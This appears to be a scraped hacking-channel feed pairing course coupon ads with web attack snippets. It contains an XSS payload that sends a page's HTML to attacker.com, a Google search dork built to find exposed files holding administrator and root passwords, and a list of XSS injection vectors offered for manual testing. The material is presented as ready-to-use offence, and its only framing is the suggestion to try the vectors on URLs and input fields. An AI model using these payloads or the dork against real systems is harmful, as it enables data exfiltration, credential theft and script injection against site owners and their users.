🎯A payload that sends current webpage to remote server

<svg/onload="(new Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML">

🎯Want administrator's creds? Google has indexed it for you:

intext:company_keyword & ext:txt | ext:sql | ext:cnf | ext:config | ext:log & intext:"admin" | intext:"root" | intext:"administrator" & intext:"password" | intext:"root" | intext:"admin" | intext:"administrator"

Master in Hacking with XSS Cross Site Scripting

Learn the most common flaws in web applications

https://www.udemy.com/xss-cross-site-scripting/?couponCode=ONE_LAKH_FREE

Python Essentials | Mastering Programming with Python

Learn and Master modern Python Fast, know how it works with examples and dive deep into it in a short time.

https://www.udemy.com/python-essentials-mastering-programming-with-python/?couponCode=PI314DIR5P10

@WebHacking

Here's a small #XSS list for manual testing (main cases, high success rate).

"><img src onerror=alert(1)>
"autofocus onfocus=alert(1)//
</script><script>alert(1)</script>
'-alert(1)-'
\'-alert(1)//
javascript:alert(1)

Try it on:
- URL query, fragment & path;
- all input fields.

Here's an updated polyglot that uses the details tag and now breaks out of template strings too.

We have another new vector for the XSS cheat sheet! This one requires user interaction and uses the method attribute with the dialog value.

<dialog open onclose=alert(1)><form method=dialog><button>XSS</button></form>